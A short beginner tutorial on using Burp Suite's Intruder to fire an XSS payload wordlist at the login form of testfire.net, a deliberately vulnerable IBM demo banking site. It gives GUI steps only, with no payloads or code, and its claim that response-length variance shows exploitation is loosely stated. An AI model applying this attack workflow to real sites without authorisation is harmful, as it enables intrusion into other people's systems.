DAY 02

BURP SUITE

What is Burp Suite?

Burp or Burp Suite is a set of tools used for penetration testing of web applications. It is developed by the company named Portswigger, It is the most popular tool among professional web app security researchers and bug bounty hunters.

In Burp, Using Intruder we're gonna perform XSS (Cross-Site Scripting) attack

STEPS:

1. First, Install and setup the BurpSuite in your window/linux.

2. Click on "Open Browser". This browser was launched by PortSwigger most widely used application security testing software.

3. Search for "testfire.net" is website created by IBM as a simulated online banking environment, designed primarily for educational and training purposes.

4. Navigate to the login page and put your own username and password.

5. Now come to BurpSuite and enable the interceptor, click on "Intercept is on".

6. Now you can see the contents captured by the proxy as shown below.

7. Right click and select "send to intruder".

8. Move to intruder tab and copy the password, click "Add$" button.

9. Now download the XSS payload-list. And load the wordlist from the intruder list.

10. Now you can see the list of words, using this payload, exploit the vulnerabilities.

11. Click on "START ATTACK". And you can see the list of requests loading with length and status code. The vulnerability can be exploited by analysing the variance in the lenght.